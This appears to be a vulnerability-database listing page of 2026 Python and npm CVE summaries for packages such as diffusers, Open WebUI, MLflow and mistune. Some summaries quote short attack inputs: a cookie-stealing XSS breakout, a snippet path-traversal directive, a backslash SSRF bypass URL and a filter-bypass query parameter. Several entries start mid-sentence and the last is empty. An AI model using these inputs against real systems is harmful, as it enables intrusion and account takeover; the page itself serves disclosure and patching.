Skip to main content

Python

2159 CVEs product

Monthly

CVE-2026-45804 PyPI HIGH PATCH GHSA This Week

Remote code execution in Hugging Face diffusers (Python package, versions < 0.38.0) is achievable via a TOCTOU race between two sequential Hub downloads inside DiffusionPipeline.from_pretrained, letting a malicious repo owner bypass the trust_remote_code guard and silently execute arbitrary Python during model loading. Exploitation requires user interaction (loading a malicious repo without pinning a revision) and high attack complexity due to a sub-second race window, but no public exploit beyond the reporter's PoC is identified at time of analysis. Affected users running diffusers <0.38.0 should upgrade to 0.38.0 where the issue is fixed.

Python RCE
NVD GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-46338 PyPI MEDIUM PATCH GHSA This Month

Path traversal in pymdownx.snippets versions 10.0.1 through 10.21.2 allows unauthenticated remote attackers to read arbitrary files from sibling directories outside the configured base_path, bypassing the restrict_base_path protection intended by CVE-2023-32309. The bypass exploits a string-prefix comparison introduced in PR #2039 that lacks directory-boundary enforcement, enabling a crafted snippet directive like '--8<-- "../docs_secret/leak.txt"' to escape the configured base directory when sibling paths share the same string prefix. Publicly available exploit code (proof-of-concept) exists in the GitHub Security Advisory; the vulnerability is not confirmed actively exploited in the CISA KEV catalog at time of analysis.

Microsoft Path Traversal Python
NVD GitHub
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-46339 npm CRITICAL POC PATCH GHSA Act Now

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent attackers to execute arbitrary OS commands by chaining two unprotected API endpoints. The Next.js authentication middleware in src/proxy.js uses a narrow route allowlist that excludes /api/cli-tools/* and /api/mcp/*, letting an attacker register an arbitrary command via POST /api/cli-tools/cowork-settings and then trigger spawn() via GET /api/mcp/[plugin]/sse. Publicly available exploit code exists (PoC published with the GHSA advisory), with CVSS 10.0 reflecting maximum severity across confidentiality, integrity, and availability.

Python Denial Of Service Docker Command Injection
NVD GitHub
CVSS 3.1
10.0
EPSS
0.1%
CVE-2026-45739 PyPI LOW PATCH GHSA Monitor

Sensitive HTTP header values entered into the Strawberry GraphQL bundled GraphiQL IDE are serialized into the browser URL query string via JavaScript's history.replaceState, exposing credentials such as Authorization bearer tokens to browser history, copy-paste clipboard actions, and server/proxy/CDN access logs. Affected are strawberry-graphql versions 0.288.4 through 0.315.3 - any Python application exposing the default GraphiQL interface without explicit opt-out. No public exploit has been identified at time of analysis, and the CVSS score of 3.1 (Low) reflects that exploitation requires user interaction; however, in developer and staging environments where the IDE is commonly left enabled, token leakage via shared URLs or log aggregation is a realistic risk.

Information Disclosure Python
NVD GitHub VulDB
CVSS 3.1
3.1
EPSS
0.0%
CVE-2026-45711 Go MEDIUM PATCH GHSA This Month

Arbitrary file write via path traversal in Mailpit's `dump --http` subcommand (versions < 1.30.0) allows any HTTP server impersonating a Mailpit instance to write attacker-controlled bytes to arbitrary paths outside the intended output directory. The attacker controls both the file path (via the message ID field in the JSON response) and the file contents (via the raw message body endpoint), enabling writes anywhere the dumping user has write permission - including cron jobs, shell startup files, and CI artifact directories. Publicly available exploit code exists (Python PoC published in GHSA-qx5x-85p8-vg4j); no confirmed active exploitation at time of analysis.

Path Traversal Python RCE
NVD GitHub
CVSS 3.1
5.9
EPSS
0.0%
CVE-2026-45568 PyPI CRITICAL GHSA Act Now

Server-side request forgery in the zrok Python SDK's ProxyShare component (versions 0.4.47 through 1.1.11) allows remote unauthenticated users to redirect proxied requests to arbitrary hosts by submitting absolute URLs in the request path. Because the Flask handler concatenates user input with the configured target via urllib.parse.urljoin, an attacker (Bob) can replace the share owner's (Alice's) intended target with any host including internal cloud metadata endpoints, and the response is returned to the attacker. No public exploit identified at time of analysis, though the GitHub Security Advisory GHSA-jh67-hwqw-m5r7 documents the technique in detail.

Path Traversal Python
NVD GitHub
EPSS
0.1%
CVE-2026-45728 Go HIGH PATCH GHSA This Week

Information disclosure in Algernon web server versions 1.17.6 and earlier allows unauthenticated remote attackers to retrieve full server-side source code, including embedded secrets, by triggering runtime errors in Lua, Pongo2, Amber, or HTML template handlers. When Algernon is started with a single file path (e.g. `algernon page.po2`), single-file mode unconditionally forces debug mode on, activating the PrettyError renderer which returns absolute file paths and complete file contents in HTTP 200 responses. Crucially, the `--prod` hardening flag does not block this behavior for non-`.lua` extensions, and publicly available exploit code exists in the GHSA advisory.

Microsoft Information Disclosure Python
NVD GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-33234 MEDIUM PATCH This Month

Server-side request forgery in AutoGPT Platform versions 0.1.0 through 0.6.51 allows any authenticated user on a shared deployment to conduct non-blind internal network port scanning and service fingerprinting by exploiting the SendEmailBlock's unvalidated SMTP connection handling. The block accepts user-supplied smtp_server and smtp_port inputs and passes them directly to Python's smtplib.SMTP(), completely bypassing the platform's dedicated SSRF defenses - the validate_url_host() function and BLOCKED_IP_NETWORKS blocklist in backend/util/request.py that every other block observes. Because smtplib surfaces TCP banners in exception messages that are persisted as visible block output, this is a non-blind SSRF, giving attackers readable reconnaissance data about internal hosts and services. No public exploit identified at time of analysis; vendor-released patch is confirmed in version 0.6.52.

Python SSRF
NVD GitHub VulDB
CVSS 3.1
5.0
EPSS
0.0%
CVE-2026-31072 PyPI CRITICAL POC PATCH GHSA Act Now

Remote code execution in APScheduler (all versions through 3.10.x and 4.0.0a5) is achievable when applications deserialize attacker-controlled data via the bundled JSONSerializer or CBORSerializer. The unmarshal_object routine dynamically imports modules and invokes __setstate__ on arbitrary classes, letting an attacker pivot an untrusted payload into code execution; publicly available exploit code exists, though EPSS remains low at 0.06% (19th percentile).

Deserialization Python RCE N A
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-4137 PyPI HIGH PATCH GHSA This Week

Local privilege escalation to arbitrary code execution in MLflow versions prior to 3.11.0 stems from insecure temporary directory permissions (0o777 and 0o770) created by NFS and model-download helpers. Any local user sharing the filesystem - particularly on Databricks where NFS is enabled by default - can overwrite cloudpickle-serialized model artifacts and gain code execution when another user's process deserializes them via cloudpickle.load(). No public exploit is identified at time of analysis, and the issue is a continuation of CVE-2025-10279 which was only partially fixed.

Python RCE
NVD GitHub VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-45553 PyPI HIGH PATCH GHSA This Week

Local file disclosure in NiceGUI versions <= 3.11.1 allows remote unauthenticated attackers to read arbitrary files accessible to the server process when applications pass user-controlled content to ui.restructured_text(). The flaw stems from Docutils being invoked without disabling file-insertion directives (include, csv-table :file:, raw :file:), enabling exfiltration of secrets, credentials, and source code. No public exploit identified at time of analysis, but the vendor advisory provides full directive-level proof patterns.

Information Disclosure Kubernetes Python Docker
NVD GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-45686 Go HIGH PATCH GHSA This Week

Remote denial-of-service in OpenTelemetry eBPF Instrumentation (OBI) versions 0.7.0 through 0.8.x allows unauthenticated attackers to crash the privileged instrumentation process by sending a crafted memcached storage command with an oversized `<bytes>` field. The integer overflow in the memcached text protocol parser produces a negative payload length that triggers a Go runtime panic in LargeBufferReader.Peek, halting telemetry collection until OBI is restarted. Publicly available exploit code exists in the GHSA-43g7-cwr8-q3jh advisory, but there is no public exploit identified beyond the PoC and the vulnerability is not listed in CISA KEV.

Docker RCE Denial Of Service Python Integer Overflow +1
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-8838 PyPI CRITICAL PATCH GHSA Act Now

Remote code execution in the amazon-redshift-python-driver (versions prior to 2.1.14) allows a malicious or compromised Redshift server, or a man-in-the-middle attacker positioned on the network path, to execute arbitrary Python code on any client that connects. The root cause is unsafe use of Python's eval() against untrusted server-supplied data inside the vector_in() function. No public exploit identified at time of analysis, but the CVSS 4.0 base score of 9.3 and PR:N/UI:N vector make this a high-priority client-side supply-chain-style risk.

Code Injection Python RCE
NVD GitHub VulDB
CVSS 4.0
9.3
EPSS
0.1%
CVE-2026-45678 Go HIGH PATCH GHSA This Week

Denial of service in OpenTelemetry eBPF Instrumentation (OBI) versions prior to 0.9.0 allows remote attackers to crash the telemetry agent by sending a malformed Postgres BIND frame with an empty or unterminated portal name payload to any monitored service. The defect lives in OBI's passive Postgres protocol parser, where missing NUL-terminator validation causes a Go slice-bounds panic, halting telemetry collection on the affected node. Publicly available exploit code exists in the GHSA-pgvv-q3wf-mm9m advisory, though the issue is not listed in CISA KEV and EPSS data was not provided.

PostgreSQL Docker Python Denial Of Service Suse
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-45829 PyPI CRITICAL NEWS GHSA Act Now

{tenant}/databases/{db}/collections endpoint. The flaw carries a maximum CVSS 4.0 score of 10.0 and was disclosed publicly by HiddenLayer; no public exploit identified at time of analysis, though detailed research has been published.

RCE Code Injection Python Chromadb
NVD GitHub
CVSS 4.0
10.0
EPSS
0.1%
CVE-2026-7304 PyPI CRITICAL GHSA Act Now

SGLangs multimodal generation runtime is vulnerable to unauthenticated remote code execution when the --enable-custom-logit-processor option is enabled, as Python objects loaded via dill.loads() will be deserialized without validation.

Python RCE Deserialization
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.3%
CVE-2021-47952 CRITICAL POC Act Now

python jsonpickle 2.0.0 contains a remote code execution vulnerability that allows attackers to execute arbitrary Python commands by deserializing malicious JSON payloads containing py/repr objects. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Python RCE Deserialization Code Injection Python Jsonpickle
NVD Exploit-DB GitHub VulDB
CVSS 4.0
9.3
EPSS
0.3%
CVE-2026-45715 npm HIGH PATCH GHSA This Week

Budibase's REST datasource integration before version 3.38.1 bypasses IP blacklist security controls through HTTP redirect following. Authenticated Builder-level users can exploit this to access cloud metadata services and internal databases by redirecting requests through attacker-controlled servers, potentially stealing AWS/GCP/Azure credentials. This vulnerability class was previously fixed in automation steps but the REST integration was overlooked, creating an inconsistent security posture.

Redis Python SSRF Microsoft
NVD GitHub
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-44716 PyPI HIGH PATCH GHSA This Week

{filename:path} endpoint fails to validate paths containing %2F-encoded directory separators, bypassing Starlette's URL normalization. Fixed in version 1.2.0 with no public exploit identified at time of analysis.

Path Traversal Python SSH
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-46383 PyPI MEDIUM POC PATCH GHSA This Month

Archive extraction boundary failure in Microsoft APM's legacy-bundle probe allows local attackers to overwrite arbitrary files on Windows systems running Python 3.10 or 3.11. When users run 'apm install' on a malicious .tar.gz file, untrusted tar members bypass path validation, enabling absolute path writes (e.g., D:/...) that compromise system integrity. Fixed in version 0.13.0. No active exploitation confirmed at time of analysis, but the local attack vector with user interaction required (CVSS AV:L/UI:R) limits real-world risk to social engineering scenarios targeting AI agent developers on Windows platforms.

Path Traversal Python Microsoft
NVD GitHub VulDB
CVSS 3.1
5.5
EPSS
0.1%
CVE-2026-2652 PyPI HIGH POC PATCH GHSA This Week

Authentication bypass in MLflow 3.9.0 and earlier allows unauthenticated remote attackers to access protected Job API and OpenTelemetry trace ingestion endpoints when the server runs with basic-auth enabled via uvicorn/ASGI. Attackers can submit jobs, read results, cancel operations, and inject trace data without credentials. The FastAPI permission middleware incorrectly enforced authentication only on /gateway/ routes, leaving /ajax-api/3.0/jobs/* and /v1/traces unprotected due to architectural mismatch between Flask and FastAPI authentication mechanisms. Fixed in version 3.10.0 with GitHub commit bb62e77 adding proper validators for all FastAPI routes.

Authentication Bypass Python
NVD GitHub
CVSS 3.0
8.6
EPSS
0.1%
CVE-2026-45370 PyPI HIGH POC PATCH GHSA This Week

python-utcp CLI subprocess environment passes all process-level secrets to every tool call. When chained with CVE-2026-45369 command injection, remote authenticated attackers with low-privilege LLM tool access can exfiltrate AWS credentials, API keys, database URLs, and other environment variables in a single HTTP request. Patch available in version 1.1.2 (NVD references 1.1.3 as fixed version). GitHub security advisory confirms proof-of-concept demonstrating credential theft via env dump to attacker-controlled endpoint.

Python Information Disclosure
NVD GitHub VulDB
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-45369 PyPI HIGH POC PATCH GHSA This Week

Command injection in python-utcp allows remote attackers to execute arbitrary shell commands on Unix and Windows systems when user-controlled tool arguments are processed by the CLI communication protocol module. The _substitute_utcp_args method in cli_communication_protocol.py directly embeds unsanitized user input into bash or PowerShell commands without escaping, enabling full remote code execution. Vendor-released patch available in version 1.1.2 with shell-quoting mitigation (shlex.quote on Unix, single-quoted literals on Windows). CVSS 8.3 indicates high complexity and required user interaction, but scope change enables container/sandbox escape scenarios. No public exploit code or CISA KEV listing identified at time of analysis, though detailed proof-of-concept exists in the GitHub security advisory demonstrating data exfiltration via curl.

Python Microsoft Command Injection
NVD GitHub VulDB
CVSS 3.1
8.3
EPSS
0.0%
CVE-2026-45366 npm MEDIUM PATCH GHSA This Month

Server-Side Request Forgery in @utcp/http <= 1.1.1 allows remote attackers to redirect tool invocations to internal services via malicious OpenAPI specs. An attacker hosting a malicious OpenAPI specification on a legitimate HTTPS endpoint can declare internal server URLs (e.g., http://127.0.0.1:9090 or http://169.254.169.254) in the servers array; the OpenApiConverter blindly trusts these URLs without revalidation during tool invocation, enabling access to cloud metadata endpoints, internal databases, and loopback services. Additionally, a prefix-bypass in hostname validation (startsWith check) allows URLs like http://localhost.evil.com to bypass discovery-time restrictions. Patch version 1.1.2 is available.

Redis SSRF Python Node.js Elastic +1
NVD GitHub
CVSS 3.1
4.7
EPSS
0.0%
CVE-2026-45675 PyPI HIGH PATCH GHSA This Week

Multiple concurrent LDAP or OAuth first-login requests on a freshly deployed Open WebUI instance can all receive administrator privileges through a TOCTOU race condition in role assignment logic. The vulnerability affects deployments using LDAP or OAuth authentication on instances with no existing users. While the regular signup handler was explicitly patched for this race condition in earlier code ('Insert with default role first to avoid TOCTOU race'), the LDAP and OAuth authentication paths were never updated with the same fix. Vendor-released patch available in version 0.9.0 (April 2026). No active exploitation confirmed (not in CISA KEV), though publicly available exploit code exists per GitHub advisory GHSA-h3ww-q6xx-w7x3. CVSS 8.1 (High) reflects network attack vector but requires high attack complexity (precise timing of concurrent requests during narrow first-deployment window).

Privilege Escalation Python
NVD GitHub VulDB
CVSS 3.1
8.1
EPSS
0.1%
CVE-2026-45672 PyPI HIGH PATCH GHSA This Week

Open WebUI versions through 0.8.11 allow authenticated users to execute arbitrary Python code in the Jupyter container by bypassing the ENABLE_CODE_EXECUTION=false configuration flag. The /api/v1/utils/code/execute endpoint fails to enforce the admin-configured feature gate (CWE-863: Incorrect Authorization), enabling any verified user to run code even when administrators believe execution is disabled. The vulnerability is confirmed by vendor POC (verified 2026-03-25) demonstrating successful code execution, file access, and SSRF to internal Docker services despite explicit admin configuration disabling the feature. Vendor-released patch available in v0.8.12 (commit 6d736d3c5) enforces the configuration check before dispatching code to Jupyter.

SSRF Authentication Bypass Python RCE Docker
NVD GitHub
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-45671 PyPI HIGH PATCH GHSA This Week

{id}/files to any user with read access. This affects all default Docker deployments where chat sharing is enabled. Vendor-released patch available in v0.9.0 (commit 2e52ad8ff). No active exploitation confirmed (not in CISA KEV). CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H scores 8.0, though real-world impact extends beyond confidentiality to permanent data destruction with no recovery mechanism.

Authentication Bypass Python Docker
NVD GitHub
CVSS 3.1
8.0
EPSS
0.0%
CVE-2026-45400 PyPI HIGH PATCH GHSA This Week

URL parser mismatch in Open WebUI allows authenticated users to bypass SSRF protections and access internal network resources. The validate_url function uses Python's urlparse library to extract hostnames for validation, while the requests library handles actual HTTP requests. These libraries disagree on parsing URLs containing backslash characters (e.g., http://127.0.0.1:6666\@1.1.1.1), allowing attackers to craft URLs that pass validation as external addresses but resolve to internal hosts. Exploitation requires low-privilege authentication but no user interaction, enabling access to cloud metadata endpoints and internal services. Fixed in version 0.9.5 per GitHub advisory GHSA-8w7q-q5jp-jvgx.

Google SSRF Microsoft Python
NVD GitHub
CVSS 3.1
8.5
EPSS
0.0%
CVE-2026-45399 PyPI HIGH PATCH GHSA This Week

{task_id}. Attackers can disrupt system-wide chat generation and background processing by continuously canceling active tasks across the multi-user instance. Publicly available exploit code exists. Vendor-released patch in v0.9.0 restricts global task endpoints to admin-only and introduces a scoped /api/tasks/chat/{chat_id}/stop endpoint for legitimate user-owned task termination. CVSS 7.1 (AV:N/AC:L/PR:L/UI:N) reflects network-accessible, low-complexity exploitation requiring only authenticated low-privilege access, with high availability impact and low confidentiality impact from task enumeration.

Authentication Bypass Redis Privilege Escalation Python
NVD GitHub
CVSS 3.1
7.1
EPSS
0.0%
CVE-2026-45398 PyPI HIGH PATCH GHSA This Week

Insecure Direct Object Reference (IDOR) in Open WebUI's retrieval API allows authenticated users to bypass knowledge base access controls and directly access, modify, or delete other users' private knowledge bases by supplying the target UUID as a collection name. The authorization gap affects seven endpoints: two read endpoints (/query/doc, /query/collection) permit exfiltration of private knowledge base content, while five write endpoints (/process/text, /process/file, /process/files/batch, /process/web, /process/youtube) enable content injection, poisoning, or complete data destruction via overwrite. Affects Open WebUI <= 0.9.4; fixed in v0.9.5 via PR #22109. EPSS data not available; no confirmed active exploitation (CVSS 7.5 reflects AC:H due to UUID prerequisite, but UUIDs leak through multiple channels per researcher analysis).

Authentication Bypass Python Docker
NVD GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-45397 PyPI MEDIUM POC PATCH GHSA This Month

Open WebUI's GET /api/v1/retrieval/ endpoint discloses RAG pipeline configuration including embedding models, chunking parameters, and RAG templates to unauthenticated attackers with a single HTTP request. The vulnerability affects v0.9.2 and earlier, where this endpoint lacks authentication guards present on all adjacent endpoints, enabling reconnaissance for RAG poisoning attacks and infrastructure fingerprinting without requiring credentials, authentication tokens, or user interaction.

Authentication Bypass Python Microsoft Information Disclosure
NVD GitHub
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-45396 PyPI MEDIUM PATCH GHSA This Month

Mass assignment vulnerability in Open WebUI v0.9.2 allows authenticated attackers to spoof user identities and manipulate model evaluation data by injecting a `user_id` field into feedback requests. The `POST /api/v1/evaluations/feedback` endpoint fails to properly validate and segregate server-set values from user-supplied input, enabling attackers to create feedback records attributed to arbitrary users and corrupt Elo-based model leaderboard rankings. Patch available in v0.9.5.

Python RCE
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-45395 npm HIGH PATCH GHSA This Week

{id}/update) fails to enforce the workspace.tools authorization check that gates code execution, allowing users explicitly denied code execution capabilities to bypass this security boundary. This breaks Open WebUI's documented trust model where workspace.tools permission is intentionally disabled by default and 'equivalent to giving them shell access to the server.' Exploitation achieves root code execution (PID 1) in default Docker deployments, enabling extraction of secrets (WEBUI_SECRET_KEY, API keys), database access, and filesystem read/write. Confirmed by GitHub security advisory GHSA-p4fx-23fq-jfg6. No public exploit or KEV listing at time of analysis, but detailed proof-of-concept with Burp Collaborator confirmation exists in the advisory.

Microsoft Python RCE Privilege Escalation Docker
NVD GitHub
CVSS 3.1
7.2
EPSS
0.1%
CVE-2026-45385 PyPI MEDIUM PATCH GHSA This Month

Modify messages from any channel member in Open WebUI v0.8.12 through v0.9.4 via Insecure Direct Object Reference (IDOR) in the message update API endpoint. Any authenticated user with group or direct message channel membership can tamper with messages sent by other members, including administrators, by bypassing message ownership verification. Publicly available exploit code exists demonstrating the vulnerability; patch available in v0.9.5.

Authentication Bypass Python
NVD GitHub
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-45365 PyPI MEDIUM PATCH GHSA This Month

Open WebUI versions 0.8.10 and earlier allow authenticated users to bypass model access control by appending ?bypass_filter=true to POST requests to /openai/chat/completions or /ollama/api/chat endpoints. The vulnerability exposes an internal-only FastAPI function parameter to external HTTP clients via query string binding, permitting any authenticated user to invoke admin-restricted models regardless of their assigned access grants. Vendor-released patch: v0.8.11 (March 2026). No public exploit code identified beyond the PoC in the advisory, but exploitation is trivial for any authenticated user.

Authentication Bypass Python
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-45338 PyPI HIGH PATCH GHSA This Week

Server-Side Request Forgery (SSRF) in Open WebUI versions ≤0.8.12 allows authenticated users with OAuth access to force the server to make HTTP requests to arbitrary internal resources and exfiltrate complete response data. Exploitation requires OAuth-enabled deployments with ENABLE_OAUTH_SIGNUP=true or OAUTH_UPDATE_PICTURE_ON_LOGIN=true. An attacker controls the OAuth provider's 'picture' claim URL, triggering server-side HTTP requests to cloud metadata services (AWS IMDS), localhost services (Redis, Elasticsearch), or internal network endpoints. The full response is base64-encoded and stored in the user's profile_image_url field, enabling complete data exfiltration. Fixed in version 0.9.0 per GitHub advisory GHSA-24c9-2m8q-qhmh. EPSS data not available; no CISA KEV listing indicates limited widespread exploitation, though publicly available proof-of-concept exists in the GitHub advisory.

Redis SSRF Python Docker Elastic
NVD GitHub
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-45331 PyPI HIGH PATCH GHSA This Week

Server-Side Request Forgery in Open WebUI's `validate_url()` function allows authenticated attackers to reach internal IPv4/IPv6 addresses, bypassing security controls via three distinct flaws: the validators library silently fails on IPv6 private-address checks (raising ValidationError which evaluates as falsy), IPv4-mapped IPv6 addresses (::ffff:10.0.0.1) evade IPv4 filtering entirely, and multiple IANA-reserved IPv4 ranges (0.0.0.0/8, 100.64.0.0/10, 192.0.0.0/24, 198.18.0.0/15, 203.0.113.0/24) remain unblocked. The vulnerability persists in the RAG web search, image editing, and other endpoints despite an earlier incomplete remediation attempt (CVE-2025-65958), enabling exfiltration of AWS IMDSv1 credentials and access to localhost-bound services. Publicly available exploit code exists (demonstrated POC in advisory), affecting Open WebUI ≤0.8.12 with fix released in version 0.9.0.

Python SSRF
NVD GitHub
CVSS 3.1
8.5
EPSS
0.0%
CVE-2026-45316 PyPI LOW PATCH GHSA Monitor

{id}/pin endpoint, which incorrectly checks for read permission instead of write permission. This privilege escalation enables read-only users to perform a write operation (toggling is_pinned state) that should be restricted to users with explicit write access. The vulnerability is limited to the pin operation and does not permit modification of note content, title, or access grants. Publicly available proof-of-concept demonstrates the bypass across all shared notes with read access.

Authentication Bypass Python Privilege Escalation
NVD GitHub
CVSS 3.1
3.5
EPSS
0.0%
CVE-2026-45315 PyPI HIGH PATCH GHSA This Week

Stored cross-site scripting (XSS) in Open WebUI ≤0.9.2 allows authenticated users with default speech-to-text permissions to upload polyglot WAV+HTML files through the audio transcription endpoint, achieving code execution in victim browsers and enabling full account takeover including administrator sessions. The vulnerability chains insecure file extension handling with unrestricted Content-Type serving and non-HttpOnly JWT storage to weaponize a single-click attack. Publicly available exploit code exists with video demonstration; no active exploitation confirmed by CISA KEV at time of analysis. CVSS 8.7 (High) reflects changed scope (S:C) and user interaction requirement, but real-world risk is elevated because the vulnerable permission defaults to enabled and the attack yields immediate admin-level access in typical deployments.

XSS RCE Python
NVD GitHub VulDB
CVSS 3.1
8.7
EPSS
0.0%
CVE-2026-45306 PyPI MEDIUM PATCH GHSA This Month

Authenticated admin users in pyLoad-ng can bypass the CVE-2026-33509 fix by setting the storage_folder to the Flask session directory (/tmp/pyLoad/flask), then downloading and reusing session files of other users via the /files/get/ endpoint to achieve account takeover. The original patch failed to block access to the session cache directory, leaving it accessible through the directory traversal protection bypass. Publicly available proof-of-concept code confirms the bypass is functional.

Authentication Bypass Python
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-45299 PyPI MEDIUM PATCH GHSA This Month

{user_id}/profile/image endpoint, executes scripts with access to localStorage and enables full account takeover of any user viewing the malicious profile image, including administrators. Two independent reporters demonstrated distinct vectors: one via HTML data URIs in new tabs (limited scope), and one via SVG data URIs served by the application origin (account takeover). No public exploit code or active exploitation has been confirmed, but the vulnerability requires only authenticated access and user interaction (viewing a profile image).

XSS Python
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-8597 PyPI MEDIUM PATCH GHSA This Month

Remote authenticated actors with S3 write access can achieve code execution in Amazon SageMaker Triton inference containers by replacing model artifacts with malicious pickle payloads that are deserialized without integrity verification. Affected versions are SDK v2 before v2.257.2 and v3 before v3.8.0. The vulnerability requires high-privilege S3 access to the model artifact path but carries severe impact including arbitrary code execution within inference containers. No public exploit code or active exploitation has been identified at time of analysis.

Python RCE
NVD GitHub VulDB
CVSS 4.0
6.4
EPSS
0.1%
CVE-2026-8596 PyPI HIGH PATCH GHSA This Week

Cleartext HMAC signing key exposure in Amazon SageMaker Python SDK versions <2.257.2 and <3.8.0 enables authenticated attackers with SageMaker describe API and S3 write permissions to forge model artifact integrity signatures and achieve remote code execution in inference containers. AWS released patches in v2.257.2 and v3.8.0 with security fixes addressing Triton HMAC key exposure and missing integrity checks. EPSS data not available; no CISA KEV listing or public POC identified at time of analysis, suggesting limited exploitation activity despite high CVSS score.

Python RCE
NVD GitHub VulDB
CVSS 4.0
8.5
EPSS
0.2%
CVE-2026-45012 npm HIGH GHSA This Week

Authenticated server-side request forgery in ApostropheCMS allows low-privilege users to force the server to fetch arbitrary internal URLs through the rich-text widget import flow. Attackers with content editing permissions can exfiltrate internal data by crafting malicious image tags that trigger server-side fetch operations, with image-compatible responses being persisted and re-hosted by the application. Publicly available exploit code exists (full Python PoC published in GitHub advisory GHSA-pr28-mf3q-qpg6), enabling immediate weaponization. All versions through 4.29.0 are affected with no vendor-released patch identified at time of analysis, creating sustained exposure for organizations running this popular Node.js CMS.

Python SSRF
NVD GitHub
CVSS 3.1
7.6
EPSS
0.0%
CVE-2026-44970 PyPI LOW PATCH GHSA Monitor

dbt-mcp DefaultUsageTracker transmits unredacted MCP tool arguments-including raw SQL queries and credential-bearing --vars JSON-to dbt Labs telemetry by default without user opt-in. Affects dbt-mcp ≤1.17.0; tracking is enabled unless users explicitly set DBT_SEND_ANONYMOUS_USAGE_STATS=false or DO_NOT_TRACK=1 before installation, creating silent exfiltration of potentially sensitive database schema, credentials, and personally identifiable information. The vulnerability has been verified by proof-of-concept source code analysis and execution against dbt-mcp v1.15.1.

Python Information Disclosure
NVD GitHub
CVSS 3.1
3.1
EPSS
0.0%
CVE-2026-44969 PyPI LOW PATCH GHSA Monitor

dbt MCP Server logs complete tool arguments including SQL queries and database credentials in plaintext to disk when file logging is enabled. Versions up to 1.17.0 write unredacted arguments from every tool invocation to dbt-mcp.log, with sensitive data such as raw SQL queries, credential-bearing vars payloads, and node selectors persisting indefinitely without automatic rotation. A local attacker with read access to the log file can extract credentials and SQL logic. Publicly available proof-of-concept demonstrates credential and PII extraction from log files.

Python Information Disclosure
NVD GitHub
CVSS 3.1
2.5
EPSS
0.0%
CVE-2026-44968 PyPI MEDIUM PATCH GHSA This Month

Argument injection in dbt-mcp v1.15.1 through v1.17.0 allows MCP clients to inject arbitrary dbt command-line flags such as --profiles-dir, --project-dir, and --target via unsanitized node_selection and resource_type parameters, enabling attackers to redirect dbt's configuration and database operations to attacker-controlled locations. The vulnerability is exploitable via two independent vectors in the _run_dbt_command() function and has been verified by proof-of-concept code demonstrating arbitrary dbt profile injection. Vendor-released patch available in v1.17.1.

Python RCE
NVD GitHub
CVSS 3.1
6.3
EPSS
0.0%
CVE-2026-44899 PyPI MEDIUM PATCH GHSA This Month

CSS injection in mistune's Image directive plugin allows unauthenticated remote attackers to inject arbitrary CSS properties via the :width: or :height: options in fenced image directives, enabling full-page phishing overlays and UI redressing attacks. The vulnerability stems from a prefix-only regex validation (_num_re.match() with no end-of-string anchor) that accepts values like '100vw;position:fixed;background-color:#e11d48;...' and renders them unescaped into style= attributes. Confirmed fixed in v3.2.1; publicly available proof-of-concept demonstrates full-viewport colored overlay generation from a single malicious :width: directive.

XSS Apple Python Red Hat
NVD GitHub VulDB
CVSS 3.1
4.7
EPSS
0.0%
CVE-2026-44898 PyPI MEDIUM PATCH GHSA This Month

Cross-site scripting (XSS) vulnerability in mistune's render_toc_ul() function allows attackers to inject arbitrary HTML and JavaScript into table-of-contents output by crafting malicious heading IDs. When heading identifiers are derived from user-supplied text (standard practice for readable slug anchors), an attacker can break out of the href attribute context with a payload like `x"><script>alert(document.cookie)</script><a href="`, causing the script block to execute in the rendered TOC. The vulnerability requires user interaction (UI:R) to view the poisoned TOC but affects all users of the generated page. Vendor-released patch available in mistune 3.2.1.

XSS Apple Python Red Hat
NVD GitHub VulDB
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-44827 PyPI HIGH PATCH GHSA This Week

Remote code execution in HuggingFace Diffusers library (versions < 0.38.0) allows attackers to execute arbitrary Python code when victims load malicious pipelines from Hugging Face Hub repositories. The vulnerability bypasses the trust_remote_code=True safeguard through a type coercion flaw where None values are interpolated as 'None.py' filenames. Attackers can achieve silent code execution by publishing repositories containing a malicious None.py file alongside legitimate-looking configuration, requiring only that victims call DiffusionPipeline.from_pretrained() on the attacker's repository. EPSS data not available; no public exploit identified at time of analysis. Vendor-released patch: version 0.38.0.

Python Code Injection RCE
NVD GitHub
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-44722 PyPI MEDIUM PATCH GHSA This Month

pyzipper before version 0.4.0 fails to use AE-2 encryption format due to an operator precedence bug, causing CRC32 checksums to be stored unencrypted in ZIP headers. Attackers with access to encrypted archives can extract plaintext CRC32 values and conduct brute-force attacks on small or low-entropy files to recover their content without decrypting the AES encryption itself. Large or high-entropy files remain practically safe under current computational constraints, but the vulnerability represents a cryptographic bypass for files under approximately 20 bytes.

Python Information Disclosure
NVD GitHub
CVSS 3.1
6.2
EPSS
0.0%
CVE-2026-43978 PyPI HIGH GHSA This Week

